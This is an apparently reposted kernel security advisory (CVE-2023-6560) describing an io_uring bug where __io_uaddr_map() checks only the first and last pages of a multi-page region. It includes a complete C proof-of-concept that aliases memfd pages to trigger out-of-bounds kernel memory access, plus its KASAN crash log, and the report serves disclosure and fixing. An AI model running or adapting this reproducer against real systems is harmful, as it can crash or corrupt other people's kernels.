
io_uring __io_uaddr_map() Dangerous Multi-Page Handling

__io_uaddr_map() in io_uring handles multi-page regions dangerously.

Packet Storm
io_uring: __io_uaddr_map() handles multi-page region dangerously

__io_uaddr_map() wants to import a region from userspace, and then address the
imported region through the linear mapping area. This requires that the
imported region is physically contiguous.

A comment in __io_uaddr_map() explains that the imported region is usually
just a single page, in which case that is trivially fine.

However, __io_uaddr_map() also has code intended to permit multi-page regions,
in which case it tries to enforce that the entire region maps to the same
folio (in other words, the same head page):

        /*
         * Should be a single page. If the ring is small enough that we can
         * use a normal page, that is fine. If we need multiple pages, then
         * userspace should use a huge page. That's the only way to guarantee
         * that we get contigious memory, outside of just being lucky or
         * (currently) having low memory fragmentation.
         */
        if (page_array[0] != page_array[ret - 1])
                goto err;

This code is wrong for (more or less) two reasons:

1. It only checks the first and last page; it doesn't check any of the pages
   in between. Userspace can easily create a set of adjacent VMAs such that
   the first and last virtual page map to the same physical page, while pages
   in between map to entirely unrelated pages.
2. It misunderstands how compound pages are represented in the kernel, and
   will always reject the case it is supposed to allow:
   `pin_user_pages_fast()` would return a set of adjacent `struct page`
   instances that are associated with the same head page / folio; it
   wouldn't return the same `struct page *` for every subpage.
   Every chunk of memory of size `PAGE_SIZE` maps to its own `struct page`.

So if this code is presented with a userspace region of the following shape,
containing individual 4K pages:

[page A][page B][...][page A]

then it will accept the region and assume that `page_to_virt(<page A>)`
returns the address of a page as big as the entire region. Accesses to the
first 4KiB of the region would work as intended; but accesses to later parts
of the region will be out-of-bounds accesses to unrelated pages.

Here's a reproducer that submits a bunch of NOP ops (zeroed sqes) until it
overruns the end of the first sq page:

```
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

#define NUM_SQ_PAGES 4

int main(void) {
  int memfd_sq = SYSCHK(memfd_create("", 0));
  int memfd_cq = SYSCHK(memfd_create("", 0));
  SYSCHK(ftruncate(memfd_sq, NUM_SQ_PAGES * 0x1000));
  SYSCHK(ftruncate(memfd_cq, NUM_SQ_PAGES * 0x1000));

  // sq
  void *sq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_sq, 0));
  // remap the last virtual page to file offset 0, so the first and last
  // virtual pages are backed by the same physical page: [A][B][C][A]
  SYSCHK(mmap(sq_data+(NUM_SQ_PAGES-1)*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_sq, 0));

  // cq (rings)
  void *cq_data = SYSCHK(mmap(NULL, NUM_SQ_PAGES*0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, memfd_cq, 0));
  // preset the sq tail in the shared rings so that all entries count as queued
  *(volatile unsigned int *)(cq_data+4) = 64 * NUM_SQ_PAGES;
  // back every later virtual page with file offset 0 as well: [A][A][A][A]
  for (int i=1; i<NUM_SQ_PAGES; i++)
    SYSCHK(mmap(cq_data+i*0x1000, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED, memfd_cq, 0));

  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_MMAP | IORING_SETUP_NO_SQARRAY /*| IORING_SETUP_CQE32*/,
    .sq_off = {
      .user_addr = (unsigned long)sq_data
    },
    .cq_off = {
      .user_addr = (unsigned long)cq_data
    }
  };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/64 * NUM_SQ_PAGES, &params));
  printf("uring_fd = %d\n", uring_fd);

  /* submit nops */
  int enter_res = SYSCHK(syscall(__NR_io_uring_enter, uring_fd, 64 * NUM_SQ_PAGES, 0, 0, NULL));
  printf("enter returned %d\n", enter_res);
}
```

It gives a KASAN splat like this (but note that the splat diagnostic is wrong
because KASAN can't detect page OOB access properly):

```
[   73.380288] ==================================================================
[   73.381745] BUG: KASAN: slab-use-after-free in io_submit_sqes+0x223/0xc00
[   73.382822] Read of size 1 at addr ffff88810263a000 by task uring-multipage/708
[   73.383967] 
[   73.384240] CPU: 6 PID: 708 Comm: uring-multipage Not tainted 6.7.0-rc2 #357
[   73.385316] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[   73.386778] Call Trace:
[   73.387177]  <TASK>
[   73.387520]  dump_stack_lvl+0x4a/0x80
[   73.388117]  print_report+0xcf/0x670
[...]
[   73.389595]  kasan_report+0xd8/0x110
[...]
[   73.391954]  io_submit_sqes+0x223/0xc00
[   73.392570]  __do_sys_io_uring_enter+0x965/0x1200
[...]
[   73.397438]  do_syscall_64+0x46/0xf0
[   73.398004]  entry_SYSCALL_64_after_hwframe+0x6e/0x76
[   73.398787] RIP: 0033:0x7ff8ed2e7989
[   73.399494] Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d d7 64 0c 00 f7 d8 64 89 01 48
[   73.402164] RSP: 002b:00007fff76dc3598 EFLAGS: 00000202 ORIG_RAX: 00000000000001aa
[   73.403277] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff8ed2e7989
[   73.404314] RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000005
[   73.411155] RBP: 00007fff76dc3690 R08: 0000000000000000 R09: 0000020000000100
[   73.412496] R10: 0000000000000000 R11: 0000000000000202 R12: 000055967f6680a0
[   73.417987] R13: 00007fff76dc3770 R14: 0000000000000000 R15: 0000000000000000
[   73.419272]  </TASK>
[removed irrelevant alloc/free traces of the accessed memory region]
[   73.449202] 
[   73.449471] The buggy address belongs to the object at ffff88810263a000
[   73.449471]  which belongs to the cache kmalloc-128 of size 128
[   73.451228] The buggy address is located 0 bytes inside of
[   73.451228]  freed 128-byte region [ffff88810263a000, ffff88810263a080)
[   73.453173] 
[   73.453429] The buggy address belongs to the physical page:
[   73.454232] page:000000002be796b3 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10263a
[   73.455535] head:000000002be796b3 order:1 entire_mapcount:0 nr_pages_mapped:0 pincount:0
[   73.456662] flags: 0x200000000000840(slab|head|node=0|zone=2)
[   73.457522] page_type: 0xffffffff()
[   73.458045] raw: 0200000000000840 ffff8881000428c0 ffffea0004747e80 0000000000000002
[   73.459143] raw: 0000000000000000 0000000080200020 00000001ffffffff 0000000000000000
[   73.460305] page dumped because: kasan: bad access detected
[   73.461091] 
[   73.461353] Memory state around the buggy address:
[   73.462038]  ffff888102639f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   73.463058]  ffff888102639f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
[   73.464277] >ffff88810263a000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[   73.465289]                    ^
[   73.465791]  ffff88810263a080: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[   73.466795]  ffff88810263a100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
```

I'm not sure about the best way to fix it - since the compound page support
can't actually have worked, as explained above, maybe it's easiest to just
drop support for compound pages? Or alternatively we could fix that, but since
nobody seems to have used it, that'd maybe be unnecessary complexity...

This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-22.

Related CVE Numbers: CVE-2023-6560.

Found by: [email protected]

Related news

Ubuntu Security Notice USN-6680-2

Ubuntu Security Notice 6680-2 - 黄思聪 discovered that the NFC Controller Interface implementation in the Linux kernel did not properly handle certain memory allocation failure conditions, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

Ubuntu Security Notice USN-6680-1

Ubuntu Security Notice 6680-1 - 黄思聪 discovered that the NFC Controller Interface implementation in the Linux kernel did not properly handle certain memory allocation failure conditions, leading to a null pointer dereference vulnerability. A local attacker could use this to cause a denial of service. It was discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

CVE-2023-6560: cve-details

An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. This issue could allow a local user to crash the system.
